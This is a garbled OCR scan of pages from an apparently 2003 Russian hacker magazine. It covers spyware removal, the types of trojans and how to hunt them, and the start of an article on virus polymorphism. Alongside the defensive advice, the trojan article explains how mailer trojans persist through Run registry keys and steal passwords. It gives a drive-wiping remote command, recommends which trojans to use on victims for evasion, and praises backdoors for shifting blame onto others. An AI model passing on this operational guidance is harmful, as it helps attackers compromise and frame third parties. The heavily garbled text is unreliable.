искивая Spyware по заранее опреде- 
ленным параметрам. 

На www.soft-portal.msk.ru есть только 
последняя версия Ad-Aware 6181 
Standard, а на родном сайте lavasoft - 
немыслимое количество различных 
версий, и даже истинный охотник на 
шпионов не будет обижен. 

Перед началом поиска нужно задать 
объекты для проверки - память, реестр, 
диски. После запуска программка сооб- 
щит тебе о количестве процессов, вы- 
полняемых в данное время на твоей ма- 
шине, и начнет постепенно вылавли- 
вать процессы-шпионы. Причем суще- 
ствует возможность создать некое по- 
добие контрольной точки восстановле- 
ния - если зараженная программа отка- 
жется запускаться после чистки, то 
можно откатиться назад и поискать 
другой способ зачистки. Ну и конечно, 
как и в любом антивирусе, статистику 
всего найденного Spyware можно сох- 
ранить в файл отчета. Тебе станут из- 
вестны системные ключи реестра и 
имена срайлов, отвечающих за рабо- 
тоспособность Spyware, а самое глав- 
ное, тебе станет известно, кто и куда на 
тебя стучит. 

Лавасосрт не ленится обновлять свои 
базы шпионского ПО, и это наводит на 
мысль, что и создатели шпионов не си- 
QAT без дела, они трудятся день и ночь 
не покладая рук для того, чтобы их пла- 
гины были без вкуса, цвета и запаха. 
Поэтому, если ты великий конспиратор, 
не ленись заглядывать на www.lavasoft- 
usa.com/ или www.lavasoft.de/. Причем 
скачивай только с этих адресов! Так как 


A еще есть такая замечательная прог- 
раммка как SpywareBlaster. Правда, она 
не ищет шпионов, она просто блокиру- 
ет все известные ей вредоносные 
ActivX компоненты, не давая им зани- 
маться своими прямыми обязанностя- 
ми. А еще она будет следить за уста- 
новкой ActivX компонентов, не позво- 
ляя устанавливаться известным ей 
шпионам. 

Максимальную защиту может обеспе- 
чить грамотно настроенный Firewall, по- 
казывающий всю пересылку данных 
как на твой компьютер, так и с него. Но 
это очень сложно, особенно если ты 
серьезно загружаешь свой канал, и тем 
более, если ты понятия не имеешь, ка- 
кой порт для чего служит. 

Теперь ты уже в состоянии защитить 
себя от всяческих посягательств. И если 
варуг окажется, что твоя любимая прог- 
рамма содержит вредоносный код - то 
ты знаешь, как с этим бороться. Только, 
как всегда, есть одно маленькое HO. В 
итоге любимая программа может отка- 
заться запускаться. А в случае, когда 
вылечить ее не удается - даже деинс- 
талляция может не уничтожить Spyware 
модуля. И лишь полная очистка диска 
вернет все к первозданному состоянию. 
В противовес 5ру\аге-компаниям су- 
ществуют компании, зарабатываю- 
щие деньги как раз на отлове софта 
шпиона. Tak, например, Websense Inc 
обещает избавить интернетчиков от 
пристальных взглядов навязчивых 
рекламодателей. На рабочее место 
устанавливается фильтр Premium 
Group Ill. Принцип его работы cnegy- 
ющий: после того, как очередная 
"шпионская программа" пошлет ин- 
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существуют программы, выдающие се- 
бя 3a Ad-aware. Их названия очень по- 
хожи на оригинал, а могут быть и вооб- 
ще идентичны. 

Можно пойти на маленькую хитрость - 
замаскировывать отправляемую тобой 
информацию, чтобы Spyware компания 
поломала голову над тем, что же им 
удалось о тебе узнать. Для этого есть 
отличная программка Proxmitron. 

Она позволит шпиону послать намного 
меньше полезной информации. 
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вер-сборщик, адрес 
этого сервера будет 
занесен в базу дан- 
ных фильтра PG Ill, 
и доступ к нему заб- 
локируется. 
Websense Inc демон- 
стрирует свою мощь 
следующим приме- 
ром: во время тести- 
рования новой CpyHK- 
ции фильтра на 12 
компьютерах в тече- 
ние месяца была пре- 
дотвращена отправка 
340 мегабайт "шпио- 
нских данных". Просто 
как в сказке! 


срормацию Ha сер- 
fel ES 


ПОСЛЕСЛОВИЕ 

и Осталось лишь подвести итог всего 
сказанного: 
Adware программы - это здорово, эко- 
номично и выгодно как для программе- 
ра, так и для юзера. 
Spyware - это неприятно, а порой даже 
очень опасно. Смерть шпионам - BOT Te- 
перь твой лозунг. Spyware - это то, чем 
приходится расплачиваться за бесплат- 
но приобретенную программку. Дове- 
ряй, но проверяй - еще один лозунг для 
любителей халявы. i 


БОЙТЕСЬ ДАНАЙЦЕВ, 


АРЫ ПРИНОСЯЩИХ \ 


БОЙТЕСЬ ДАНАЙЦЕВ, 
ДАРЫ ПРИНОСЯЩИХ 


ТРОЯНЫ: ВИДЫ, ПРИНЦИПЫ РАБОТЫ, ЗАЩИТА 


наешь, сколько видов 
живых существ обита- 
ет на Земле? Я тоже не 


Типичное 


описание 
вируса выг- 
лядит при- 
мерно так: 
SamiiKrutoi 
Virus.Bu- 
pyc.Win32.P 
Е-инфек- 
тор.полимо- 
рфный(оли- 
гоморф- 
ный). 


знаю, но уверен, что 
много. Тем не менее, 
биологи сумели разделить все это 
многообразие всего на пять царств 
(кстати, одно из них - вирусы). Прав- 
да, царства, в свою очередь, делятся 
на подцарства, подцарства - на типы, 
типы - на классы и т.д. Получается go- 
вольно сложная система. Электрон- 
ных форм жизни, естественно, гораз- 
gO меньше, но классификация их по 
сложности не уступает той, что при- 
нята у биологов. Удивлен? Конечно, 
для пользователя AOL есть только 
два типа программ: вирусы и не-виру- 
сы :), обычный юзер знает еще значе- 
ние слова "троян", и только уж сов- 
сем продвинутые товарищи знакомы 
с таким понятием, как "червь". Но 
знаешь ли ты, какую классификацию 
используют антивирусники? Типич- 
ное описание вируса выглядит при- 
мерно так: SamiiKrutoiVirus.Bu- 
pyc.Win32.PE-uHqpektop.nonumopcp- 
ный(олигоморерный). Впечатляет? Ec- 
ли нет, добавь сюда имя автора (если 
оно известно), дату появления в Се- 
ти, степень опасности etc. 


Знаешь, какую ошибку совершил 
Карл Линней, когда пытался разде- 
лить растения на несколько классов? 
Он объединял их не по строению, а по 
внешнему виду: тут цветы с пятью ты- 
чинками, тут - с четырьмя и т.9. Хм, 
что-то я в биологию ударился :). Ну, 
да ладно. Современная же наука де- 
лит живой мир на группы, исходя из 
внутреннего строения существ. Но ес- 
ли рассуждать подобным образом о 
цифровых формах жизни, возникают 
некоторые проблемы, так как с точки 
зрения пользователя, т.е. по внешне- 
му виду, все эти формы одинаковы и 
имеют вид исполняемых срайлов. А 
классиффицируя электронные сущнос- 
ти по внутреннему строению, получим 
показанную выше систему антивирус- 
ников, которая не отличается нагляд- 
ностью и довольно неудобна. Поэто- 
му мы будем по старинке делить cpay- 


ХАКЕРСПЕЦ 


10(35) | 2003 


ну Сети всего на три группы - вирусы, 
черви и трояны. Но прежде чем прис- 
тупать к подробному рассмотрению 
последних, разберемся в отличиях 
этих форм жизни друг от друга. 


ВИРУС, ЧЕРВЬ ИЛИ ТРОЯН? 

ш Итак, вирусы. Основной признак - 
вирусы заражают файлы. И забудь 
про вредоносные вирусы - большин- 
ство из них написано озлобленными 
одиночками; редкая VX-rpynna рели- 
зит вирусы вроде СН, т.е. с "деструк- 
тивной полезной нагрузкой", как они 
это называют. Ведь вирусы оля насто- 
ящего вирмейкера - это искусство, му- 
зыка. Зачем же портить мелодию кри- 
ками невинных жертв? Повторюсь, я 
говорю о настоящих вирмейкерах, ко- 
торых сегодня не так много, а не о тех 
индивидуумах, что копируют чужие 
работы с единственной целью - покра- 
соваться в вирусной десятке Касперс- 
кого. И поверь мне, никто из настоя- 
щих вирмейкеров не выпускает свои 
творения дальше своего винта в ви- 
де, отличном от исходников. 


Черви. Основной признак - не зара- 
жают ‹файлы, а просто устраивают се- 
бе где-нибудь на винте скрытую рези- 
денцию и оттуда рассылают себя на 
другие машины. Чтобы создать эф- 
фективный вирус, нужно прекрасно 
разбираться в операционке, под кото- 
рую ты пишешь, разбираться во всех 
тонкостях ассемблера (и не говори 
мне о вирусах на Си) и, к тому же, 
весьма желателен определенный 
склад ума. А знаешь, на чем написано 
большинство сегодняшних червей? 
Visual Basic и VBScript. Теперь пони- 
маешь, почему их так много? Правда, 
среди червей иногда попадаются 
очень достойные экземпляры, но это, 
скорее, исключение, чем правило. Так 
что если сила вирусов - в качестве ко- 
да, то червей - в количестве инфици- 
рованных машин. На рисунке это по- 
казано очень наглядно. 


Наконец-то добрались и до троянов. 
Все-таки настоящих вирмейкеров - 
идейных и благородных - немного, по- 
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этому и вирусы, и черви чаще всего 
несут в себе некоторый деструктив- 
ный элемент. Даже те вирусы, чья по- 
лезная нагрузка исчерпывается выве- 
дением надписи на экран, могут по- 
портить пользователю немало нер- 
вов, что уж говорить о более опасных 
вирусах. Так вот основной признак 
трояна состоит в том, что это всего 
лишь инструмент, а способ его приме- 
нения - дело второе. Один человек 
может написать троян исключительно 
в образовательных целях, изучая се- 
тевые протоколы, а другой использо- 
вать этот троян в целях, мягко говоря, 
не совсем законных :). Вот с этими-то 
двуликими сущностями мы и будем 
разбираться все оставшееся время 
(вернее, место). И первое, что необхо- 
димо запомнить - есть два типа троя- 
нов: мейлеры и бэкдоры. 


МЕЙЛЕРЫ 

m Выглядит это просто: юзер запус- 
кает "новый патч для Аутлука", и че- 
рез несколько минут вся ценная ин- 
формация уходит на нужный е-мейл. 
Большинство троянов этой категории 
похожи gpyr на друга, как две капли 
воды, за исключением интерфейса. А 
похожи они потому, что работают по 
одному и тому же алгоритму. 


Для начала надо устроиться в сис- 
теме, не вызвав подозрений у жерт- 
вы. Согласись, странно, когда патч 
для Аутлука не патчит Аутлук? Этому 
должно быть логическое объяснение. 
Тут методов масса: от примитивных 
"msmustdie.dll not found" и "already 
patched", go изысканного метода, ког- 
да выводится окошко установки "пат- 
ча", а после ее завершения открыва- 
ется readme со списком пофиксенных 
ошибок :). А в это время троян копи- 
рует себя куда-нибудь в 
%windir%\system и спокойно присту- 
пает к обработке системы. Для начала 
ему необходимо прописаться в авто- 
загрузке. Опять же, способов куча. 
Откровенно тупые трояны вписывают- 
ся в папку "автозагрузка" или в 
autoexec.bat. Те, что попродвинутей - 
в win.ini uv system.ini. Hy, а подавляю- 
щее большинство прописывается в 
реестре в следующих местах: 


HKEY_LOCAL_MACHINE\SOFT- 
WARE\Microsoft\Windows\CurrentVer- 
sion\Run 

HKEY_LOCAL_MACHINE\SOFT- 
WARE\Microsoft\Windows\CurrentVer- 
sion\RunOnce 

HKEY_LOCAL_MACHINE\SOFT- 
WARE\Microsoft\Windows\CurrentVer- 
sion\Runservices 

HKEY_LOCAL_MACHINE\SOFT- 
WARE\Microsoft\Windows\CurrentVer- 
sion\RunservicesOnce 


Освоившись в системе, троян начи- 
нает собирать данные. Низкоклас- 
сные особи просто отсылают на ука- 
занное мыло файлы *.pwl, *.зат и т.д., 
навороченные же устраивают на вин- 
те жертвы целый расшифровочный 
цех, отправляя хозяину уже готовые 
пароли от всего, до чего смог дотя- 
нуться троян. Зачастую троян записы- 
вает все нажатия клавиш и раз в день 
отправляет домой. Элементарные ко- 
ни так и живут: загрузился, получил 
нужную информацию, отправил хозя- 
ину. Трояны посложнее реализуют та- 
кие вещи, как периодическое самооб- 
новление и защита от антивирусов: 
шифрование и т.д. Самые же достой- 
ные представители мейлеров позво- 
ляют управлять собой посредством е- 
mail команд (а также IRC, ICQ или пря- 
мого коннекта - прим. peg.). Т.е. троян 
периодически проверяет определен- 
ный ящик, куда хозяин шлет инструк- 
ции, типа "PRINT "Have fun!"; DEL 
c:\**; END". 


BOK OPI 

и Слово BackDoor означает "потай- 
ной ход". Такой троян состоит из двух 
частей: клиентской и серверной. Кли- 
ент обычно имеет красивый GUI с ку- 
чей кнопок и прочие навороты, ибо 
всю свою жизнь проводит на компью- 
тере хозяина, а значит, не заботится о 
своем размере. Собственно троян на- 
ходится в серверной части. До тех 
пор, пока не пришла пора собирать и 


отсылать данные, алгоритмы бэкдо- 
ров и мейлеров совпадают: обмануть 
пользователя, устроиться в 
%windir%\system и прописаться в ав- 
тозагрузке. Но потом начинаются 
серьезные отличия. Злоумышленник, 
подославший трояна, выходит в Сеть, 
запускает клиентскую часть и смот- 
PUT, есть ли отклик от сервера, т.е. на- 
ходится ли жертва также в Сети. Если 
отклик получен, сервер и клиент уста- 
навливают связь, а дальше все зави- 
сит от конкретного трояна: те, что 
поскромнее, откроют доступ к вражес- 
кому винту или еще что-то в этом ду- 
Хе, а те, что покруче, попросту отдадут 
власть над всем компьютером в руки 
злоумышленника: тот сможет управ- 
лять компьютером жертвы, как если 
бы сам сидел за ним. 


‚ CultDeadCow - создатели BackOrifice 


Тут уже открывается простор для 
изощренной сфантазии: можно отклю- 
чить на удаленном компе антивирус, 
можно поставить еще пару троянов - 
на всякий случай, можно использо- 
вать чужой компьютер как плацдарм 
для проведения сетевых атак или 


случаях существуют ниточки, по кото- 
рым квалифицированный человек мо- 
жет вычислить того, кто подослал тро- 
ян. Издержки технологии. Каждый 
троян решает эту проблему по-свое- 
му. Например, можно хранить инфор- 
мацию о хозяине в зашифрованном 
виде и выполнять расшифровку толь- 
ко в случае необходимости. Приемле- 
мым вариантом также является ис- 
пользование проксей, цепочек ремей- 
леров и прочих интересных вещей. 


Вообще можно выделить еще один 
тип троянов, хотя правильнее было 
бы относить такие программы к чер- 
вям - это трояны, которые вообще не 
поддерживают связь с хозяином. Ес- 
ли цель мейлеров и бэкдоров заклю- 
чается в предоставлении доступа к 
конфиденциальной информации, то 
цель этих троянов - захват вычисли- 
тельных или сетевых ресурсов компь- 
ютера жертвы. Теперь понятно, поче- 
му таких коней иногда называют зах- 
ватчиками? Они, будучи запущены в 
стан врага, навсегда забывают о доме 
и занимаются исключительно своими 
делами, такими как рассылка спама 
или атаки на какой-либо сервер - сот- 
ня-другая троянов может провести 90- 
вольно эффективную атаку, будь то 
DoS или что-то еще. И главное, как и в 
случае с бэкдорами - ответственность 
перекладывается их несчастных обла- 
дателей. 


КАК HE BCTPATb? 

m= Вирус, расплодившийся на твоем 
компьютере - это проблема, вирус, 
уничтоживший твою информацию - 
это беда, но осознание того, что кто- 
то смотрит твои картинки, читает твои 
письма, и сидит в интернете за твой 
счет, злит гораздо больше. Во всяком 
случае, меня. Как же не встрять? 
Прежде всего, почитай статью "Пра- 
вила поведения в Сети" в этом номе- 


Вообще, бэкдоры - 
отличное подспорье в деле перебора 
или расшифровки паролей 


просто для дальнейшего распростра- 
нения троянов. Вообще, бэкдоры - от- 
личное подспорье в деле перебора 
или расшифровки паролей: подкинув 
свой троян десятку человек, ты потра- 
тишь на это в десять раз меньше вре- 
мени (а если троянов будет сто или 
тысяча?) и заодно переложишь ответ- 
ственность на чужие плечи :). 


ЕЩЕ ОДИН ТИП 

m Как видишь, оба типа троянов так 
или иначе указывают на "хозяина". 
Мейлеры знают его почтовый адрес, 
бэкдоры вообще связываются с его 
компьютером напрямую, т.е. в обоих 


ре нашего журнала. Там более чем 
подробно все описано. Отыскивая в 
Сети интересные трояны оля этой 
статьи, я с трудом нашел незаражен- 
ные различными подарками, типа ви- 
рей и других троянов. Знаешь, как ве- 
село выглядит клиент бэкдора А, на 
самом деле являющийся еще и серве- 
ром трояна В? :) Кстати, вот еще ин- 
формация для размышления: пишет- 
ся троян, в его коде делается специ- 
альный "черный ход", и троян выкла- 
дывается в Сеть, на какой-нибудь хац- 
керский сайт - "Новый крутой троян! 
Скачай быстрее!" Народ кидается про- 


бовать: захватывают чужие системы, у 


Ведь виру- 
сы для нас- 
тоящего 
вирмейкера 
= это искус- 
ство, музы- 
ка. Зачем 
же портить 
мелодию 
криками не- 
винных 
жертв? 


99% троя- 
нов загру- 
жаются 


вместе с 
операцион- 
кой и оста- 
ются в па- 
мяти 90 
выключения 
компьюте- 
ра. А зна- 
чит, если 
мы прос- 
мотрим все 
процессы, 
запущенные 
системой, 
среди них 
окажется и 
троян. 


Тут уже 
открывает- 
ся простор 
для изощ- 
ренной 
фантазии: 
можно вы- 
рубить на 
удаленном 
компе анти- 
вирус, мож- 
но поста- 
вить еще 
пару троя- 
нов - на 
всякий слу- 
чай... 


Попроси у 
знакомого 
вирмейкера 
написать 
программу, 
выводящую 
на экран 
строку, так, 
чтобы ты 
не смог ра- 
зобраться в 
исходниках 
- будь уве- 
рен, ты не 
разберешь- 
ся :). 


БОЙТЕСЬ ДАНАЙЦЕВ, 


АРЫ ПРИНОСЯЩИХ \ 


бесплатно сидят в инете ит.д. А тем 
временем человек, написавший троя- 
на, наслаждается властью над всеми 
затрояненными компьютерами. Чем- 
то финансовую пирамиду напомина- 
ет. Но так как пользователь нынче 
пуганый пошел, часто делается так: 
вместе с трояном публикуются его ис- 
ходники, мол, все по-честному. Юзер 
видит файл *.срр, успокаивается и 
вляпывается в большие неприятнос- 
ти, так как что стоит выкинуть из ис- 
ходника реализацию того самого 
"черного хода"? Правда, товарищи со 
стажем в подобных делах, в таких 
случаях не пользуются готовым эк- 
зешником, а компилируют свой из 
предоставленного исходника. Но и 
для этого метода есть контрмеры: 
случается так, что те пятнадцать 
строк, что отвечают за потайной ход, 
днем с огнем не найти в тысячах 
строк кода трояна. 


Но что делать человеку, который 
все-таки запустил "патч для Аутлу- 
ка"? Или тому, кто раскусил подставу 
и хочет добраться gO хозяина? Читать 
дальше. 


ВСКРЫТИЕ 

ш Что мы имеем: у тебя есть силь- 
ные подозрения, что твоя машина 
затроянена, и тебе нужно, как мини- 
мум, убить коня, а если повезет, то и 
добраться go хозяина. Итак, алгоритм 
охоты на троянов! 


@. Для начала необходимо найти 
файл трояна. Самый простой и быст- 
рый способ сделать это - антивирус. 
Если он найдет трояна, самое боль- 
шее, что он сможет сделать - удалить 
его. Если тебя это устраивает, 
действуй. Меня же интересует тот гад, 
который подослал ко мне заразу. Ес- 
ли троян найден, вырубаем антивирус 
и goto 4. 

@. Если антивирь ничего He нашел, 
будем искать вручную. Запускаем 
regedit и изучаем ключи автозагрузки 


чит, если мы просмотрим все процес- 
сы, запущенные системой, среди них 
окажется и троян. Запускаем Task 
Мападег и начинаем изучать список 
процессов в поисках "левого". Боль- 
шинство троянов не называют свои 
процессы подозрительными именами, 
а выбирают что-то нейтральное, вро- 
ge "print service" или "sound mixer". 
Ho какой, к черту, саундмиксер, если у 
нас запущены только основные служ- 
бы? Так что ищи все, отличное от яд- 
ра системы. Если троян все еще не 
найден, можешь отказываться от по- 
исков: увы, этот экземпляр тебе не по 
зубам (или это просто паранойя). 


Ищем левые процессы... 


@. Итак, мы знаем, в каком cpamne 
сидит троян! Лучше всего взять в ру- 
ки дизассемблер и разобраться с ним 
раз и навсегда. Если с дизасмом туго, 
читай дальше. Запускаем regedit и 
ищем в реестре все упоминания об 
этом файле. А найти можно много ин- 
тересного: мыло, на которое уходят 
твои пароли, порт, по которому сое- 
диняется бэкдор, расположение ко- 
пий трояна на твоем винте и т.д. Если 
вся информация о хозяине есть в ре- 
естре - поздравляю, что ты будешь 
делать дальше, зависит исключи- 
тельно от тебя и, главное, от твоих 
ВОЗМОЖНОСТЕЙ :). 

©. Если поиск по реестру ничего не 
дал, запускаем поиск по всему винту: 
нас интересуют файлы, содержащие 
имя трояна. Конь может хранить свои 


Лучше всего взять в руки 
дизассемблер и разобраться 
с ним раз и навсегоа. 


(см. выше), а также просматриваем 
system.ini, win.ini, если мы живем под 
убогой Windows 9x. Ищем все подоз- 
рительные названия: если видишь 
программу с названием, типа "trojan" 
или "msfucker", поиск окончен; также 
нужно обращать внимание на назва- 
ния, в которых есть слова "Server", 
"srv" или "ras" (Remote Access 
Service). Если троян найден, goto 4. 
@. 99% троянов загружаются вмес- 
те с операционкой, и остаются в памя- 
ти gO выключения компьютера. А зна- 
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настройки в каком-нибудь wincmd.ini, 
под самым твоим носом. 

@. Если и пятый пункт не дал ре- 
зультатов, делаем следующее: внима- 
тельно просматриваем срайл, в KOTO- 
ром сидит троян. Можно найти много 
интересного: электронный адрес хозя- 
ина, IP, порты и т.д. Я видел много тро- 
янов-мейлеров, которые хранили в 
незашифрованном виде адрес, по ко- 
торому отсылали инфу. 

Ф. Итак, все предыдущие методы не 
помогли, или тебе нужна дополни- 


тельная информация о хозяине. Все 
довольно просто: ставим firewall (я 
предпочитаю ZoneAlarmPro) и выхо- 
дим в онлайн. Троян, будь то мейлер 
или бэкдор, периодически проверяет, 
находится ли компьютер в Сети, и, ес- 
ли так, отправляет домой ворован- 
ную инфу или пытается соединиться 
с клиентом. Вот в этот момент, любой 
нормальный брандмауэр выводит со- 
общение, дескать, такая-то програм- 
ма (вот троян и попался) пытается 
открыть соединение на таком-то пор- 
ту - разрешить? Нам нужен хозяин, 
поэтому разрешаем. Троян спокойно 
соединяется с домом, и наш сфаервол 
показывает IP-agpec этого самого go- 
ма! Все, рубим соединение, избавля- 
емся от трояна и начинаем вспоми- 
нать, что можно сделать с человеком, 
зная его IP :). 


ICH BIN TROJAN 

и Теперь я поделюсь впечатления- 
ми о некоторых троянах, попавшихся 
мне на глаза за последнее время. 
Кстати, ты знаешь, как разбираться в 
особенностях работы конкретного 
трояна, не имея жертвы? В случае с 
мейлерами все просто - ставишь в 
настройках свой адрес и читаешь 
собственные пароли, смотришь, какие 
антивирусы обнаруживают троян и 
т.д. Если же тебя интересует бэкдор, 
запускаешь у себя на машине сервер 
и коннектишься к нему через клиент 
по IP 127.0.0.1. Таким образом без 
лишнего риска можно разобраться в 
тонкостях настройки и работы трояна, 


прежде чем использовать его по-нас- 
тоящему. 


Коннектимся сами к себе через 
BackOrifice 


BO2K (backdoor, размер сервера 112 
Кб, невидим gna Taskinfo в 9x) 


Я за собой наблюдаю :) 


Только не говори, что не слышал 
о нем. Я не хотел включать в 


статью описание таких известных 

троянов, как Ме Виз unu GirlFriend, 
но обойти молчанием BackOrifice я 
просто не мог. 

Самый навороченный бэкдор из 
всех, что я видел. Единственный из 
перечисленных в этом разделе троя- 
нов, который смог укрыть свой про- 
цесс от TaskInfo. О ВОРК можно напи- 
сать не одну статью: гибкое конфигу- 
рирование, различные способы шиф- 
рования, несколько десятков плаги- 
нов, Мпих-версия - этим список досто- 
инств BackOrifice не исчерпывается. 
Но рекомендовать этот троян для ис- 
пользования я не могу из-за одного- 
единственного недостатка, который 
сводит Ha нет все его достоинства. 
Дело в том, что BackOrifice настолько 
распространен и известен, что наука 
не знает антивируса, неспособного 
его обнаружить. Ребята из 
CultDeadCow пытались исправить это, 
релизя плагины, призванные скры- 
вать ВО от конкретных антивирей, HO 
в целом ситуация не изменилась, и 
сегодня BackOrifice2000 - отличный 
инструмент для удаленного админист- 
рирования, но никак не троян. 


Нае@и соседа (mailer, размер серве- 
pa 13 Кб, видим gna Taskinfo) 


7 SSS a 


Этот мейлер пользуется в России 
особым успехом, я бы даже сказал, 
что это наш национальный троян. 
Элементарно настраивается, элемен- 
тарно используется. Примечателен 
также маленький размер сервера, так 
что троян можно незаметно присое- 
динить к другой программе. Одним 
словом, народный выбор: знаний не 
требуется никаких, эффективность 
высокая. 


Anti-Lamer Light (mailer, размер сер- 
вера 24 Кб, видим gna TaskInfo) 

Простенький почтовый троян, обе- 
щает вырубать известные ему анти- 
вирусы и фаерволы. Через конофигу- 
ратор сервер можно склеить с другим 
файлом. 

Это "облегченная версия" трояна 
Anti-Lamer Backdoor, который имеет 
несколько интересных возможнос- 
тей, но, конечно, и в подметки не го- 
дится ВО. 
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FurierTrojan (mailer, размер сервера 
38 Кб, видим для Taskinfo) 

Хм. Большой сервер, отсутствие воз- 
можностей для коноригурации (наст- 
раивается только е-тай), определяет- 
ся TaskInfo. Короче говоря, не наш 
выбор. 


GROB (backdoor/mailer, размер cep- 
вера 49 Кб, видим gna Taskinfo) 

Полноценный мейлер с некоторыми 
возможностями бэкдора. Самозащита 
- минимальная, алгоритм работы - 
стандартный, сервер - большой. Един- 
ственным преимуществом перед соб- 
ратьями является приятный интер- 
фейс клиента :). 


Знаешь, зачем я добавил к статье 
этот краткий обзор? Чтобы ты уловил 
общее состояние "рынка троянов" на 
сегодня. Что мы видим: новых бэкдо- 
ров практически нет, защиты не хва- 
тает даже на то, чтобы качественно 
спрятать свой процесс, повсюду низ- 
косортные почтовые трояны, фанта- 
зия авторов ограничивается выведе- 
нием окошка "data.cab not found". Ho 
в постоянном появлении новых троя- 
нов, пусть и низкопробных, есть свои 
плюсы. Помнишь, что я говорил о 
BackOrifice? При том, что технически 
это самый хороший бэкдор из суще- 
ствующих, использовать его сегодня, 
по меньшей мере, глупо. В то же вре- 
мя, примитивный троян, вышедший 
неделю назад, и поэтому еще не за- 
несенный в базы антивирусов, будет 
гораздо эсрфрективнее могучего 
ВОРК. В качестве "золотой середи- 
ны" можно посоветовать использо- 
вать такие экземпляры, как 
DonaldDick или NetSphere, которые 
являются промежуточным звеном 
между элитными, но слишком распро- 
страненными троянами и малоизвест- 
ными низкосортными. 


Р.5. Раздумывая, где бы скачать нес- 
колько новых троянов для обзора, я 
отправился на Гугл и сделал запрос 
по спову "trojan". Так я открыл для се- 
бя сайт www.trojancondoms.com. Чего 
только не придумают :). ac 


САМЫЙ МУЗЫКАЛЬНЫЙ 


№_ Многие старые вири любили 
играть музыку - "янки дудль", "К 
Элизе", Гимн СССР, наконец, но 
1 место отдано вирусу HOLMS за 
исполнение музыки из отечест- 
венного х/ф "Приключения 
Шерлока Холмса и доктора Ват- 
сона". Между прочим, музыку из 
него взял и И.Данилов как зву- 
ковое оповещение в старом 
Dr.Webe. Я имею в виду событие 
"Заражение неизвестным виру- 
сом" :). Эту музыка есть в кол- 
лекции вирусных эсрофектов на 
нашем диске. 


САМЫЙ КРАСОЧНЫЙ 


№ Ничем, в общем, He примеча- 
тельный вирус LSD, написан- 
ный в начале 90-x, просто пора- 
зил меня своими эфоректами. За 
истекшие 10 лет вирмейкеры не 
придумали ничего лучше, поэ- 
тому - скорей беги на диск и за- 
пускай LSD.com. Это - выдран- 


ный из вируса acpqpekt. Не бой- 
ся, это безопасно. Наверное, 
единственный легальный спо- 
соб почувствовать глюки чело- 
века, обдолбившегося ЛСД. 


ПОБЕДИВШИЙ 
АНТИВИРУС 


Ш One Half. Да, именно этот 
старенький полиморефный ви- 
рус, наделавший много шума 
в ex-USSR. Он составил хоть 
какую-то конкуренцию антиви- 
русникам. Дело в том, что этот 
монстр имел маленькое хобби 
- с каждой перезагрузкой 
шифровать по 2 цилиндра 
диска. Первым антивирусом, 
который смог его вылечить, 
был Dr.Web. Действительно, 
тело вируса из файлов он уда- 
лял, а вот расшифровывать - 
забывал, вследствие чего 
юзер получал нехилую поте- 
рю информации. Правда, все 
закончилось хорошо - Web 
быстро образумился, и новые 
версии выносили "половин- 
щика" уже без потерь. 


Лозовский Александр 
(alexander@real.xakep.ru) 


Техника шифрования 
Введение в полиморфизм 


Подвижные вирусы: 
миф или реальность? 
Технологии распространения 
червей 


Заражение файлов 
6 способов инорицировать PE-cpamn 


Пишем свой стелс 
Стелс-технологии в вирусах 


Игры настоящих 
кодеров 
CoreWar aka бой в памяти 


Борьба за выживание 
Способы защиты от антивирусов 
RingO 
Уход в нулевое кольцо защиты 
Win9x 


High Level Code 


Вирусы Ha языках высокого уровня 


ТЕХНИКА ШИФРОВАНИЯ | 


ТЕХНИКА 


ШИФРОВАНИЯ 


Докучаев Дмитрий aka Forb (forb@real.xakep.ru) 


KAK 
ЭТО РАБОТАЕТ? 

и Вообще, полиморфизм - 
высококлассная техника, поз- 
воляющая вирусу быть неза- 

меченным по стандартной сигнатуре (или, 
попросту, маске). Обычно детекторы заразы 
определяют вирь по характерным кускам его 
кода. В случае с полиморориком такое не 
прокатит. Два файла, зараженные одним и 
тем же вирусом, всегда будут иметь разный 
размер. Как ты понимаешь, задетектить та- 
кую заразу очень сложно. Для этого приме- 
няются различные методы, которые будут из- 
ложены далее. 

Все поплиморофики обязательно снабжаются 
расшисфровщиком кода, который по опреде- 
ленному принципу преобразует переданный 
ему код, вызывая при этом стандартные 
функции и процедуры операционной систе- 
мы. Сами методы шифрования могут быть 
разными, но, как правило, каждая операция 
имеет свою зеркальную пару. В ассемблере 
это реализуется очень просто, и таких пар 
может быть много - ADD/SUB, XOR/XOR, 
ROL/ROR и т.п. Подобные операции прово- 
дятся для расшифровки ячеек памяти. 
Немаловажной особенностью полиморера 
является то, что вирус содержит мусор, то 
есть операнды, функции и процедуры, кото- 
рые служат лишь для запутывания кода. При 
этом реализуются две цели: 


@. Сложность изучения кода при трасси- 
ровке файла. Эта цель актуальна лишь для 
новичка, профессионал, который собаку Cb- 


ВВЕДЕНИЕ В ПОЛИМОРФИЗМ 
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Принципиальная схема полиморфика 


ел на изучении вирусов, сразу во всем раз- 
берется. 

©. Увеличение элемента случайности в 
расшисфровщике. Помнишь, я говорил про 
зеркальные команды? Место их вставки име- 
ет огромное влияние на размер кода. С мусо- 
ром же появляются новые варианты компо- 
новки кода. Размер при каждом из них будет 
разным. 


Ассемблер дает безграничные возможности 
по вставке мусора, поэтому вставки могут 
быть различными. Вот некоторые их виды: 


@. Регистровые операции. Как правило, 
арисфметические и логические. Примером мо- 
гут служить следующие команоы: inc ах; Mov 
ax,[si+bx-04]; add ax,1234h и gp. 

©. Зеркальные команды. Такие, как 
add/sub, inc/dec и прочие. Про них я упоми- 
нал выше. 

©. Ложные переходы, а также вызов Nogn- 
рограмм, содержащих мусор (jmp $+1Oh; call 
XXXxXh). 

@. Простой мусор из одиночных операндов 
(daa; пор; cld и T.g.). 


УРОВНИ ПОЛИМОРФИЗМА 

и Выделяют несколько уровней полимор- 
физма, используемых в вирусе. Каждый из 
них по-разному реализует неодинаковый 
размер файлов, которые были заражены. 


Уровень 1. Самые простые опигоморорные ви- 
русы. Они используют постоянные значения 
для своих расшифровщиков, поэтому легко 
определяются антивирусами. Из за этого за- 
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'Запутанные команды ассемблера 


разу прозвали "не очень Nonumopcp- 
ной". Примеры таких вирусов: Cheeba, 
December_3, Slovakia, V-Sign, Whale. 


Уровень 2. Вирусы, имеющие одну 
или две постоянные инструкции, кото- 
рые используются в расшифровщи- 
ке. Также определяются по сигнатуре, 
но имеют более сложное строение, 
чем представители первого уровня. 
Примеры: ABC, DM, Flip, Jerusalem, 
Ontario, PC-Flu, Phoenix, Seat, Stasi, 
Suomi. 


Уровень 3. Вири, использующие в 
своем коде команды-мусор. Я уже 
упоминал принцип строения такого 
файла. Эта, в своем роде, ловушка OT 
